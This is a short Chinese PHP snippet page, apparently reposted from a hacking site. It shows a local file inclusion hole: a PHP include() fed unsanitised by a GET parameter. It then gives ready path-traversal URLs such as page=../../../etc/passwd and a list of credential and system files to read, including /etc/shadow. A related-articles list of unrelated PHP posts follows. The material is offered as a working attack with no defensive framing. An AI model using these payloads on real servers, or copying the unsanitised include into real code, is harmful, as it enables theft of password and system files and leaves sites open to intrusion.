php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

相关文章

php实现比较两个字符串日期大小的方法

本文实例讲述了php实现比较两个字符串日期大小的方法。分享给大家供大家参考。具体如下: <?php function dateBDate($date1, $date2)...

Ubuntu12下编译安装PHP5.3开发环境

最近项目遇到一个坑爹的事情,一个源码必须使用PHP5.3,但是现在Ubuntu上自带的版本是5.4,降级之后会出各种奇怪的问题,最后没办法,只能一步步在Ubuntu12.04server...

php自定义函数之递归删除文件及目录

复制代码 代码如下: /*—————————————————— */ //– 递归删除文件及目录 //– 例: del_dir (‘../cache/');注意:返回的/是必须的 //–...

php解析xml提示Invalid byte 1 of 1-byte UTF-8 sequence错误的处理方法

错误提示Invalid byte 1 of 1-byte UTF-8 sequence原因分析在中文版的window下java的默认的编码为GBK,也就是所虽然我们标识了要将xml保存为...

php网页病毒清除类

本文实例讲述了php网页病毒清除类。分享给大家供大家参考。具体如下: 相信很多人的网页经常被无故的在php,asp,html,js 等文件后台加上一些木马地址,造成了很大的困扰!我以前有...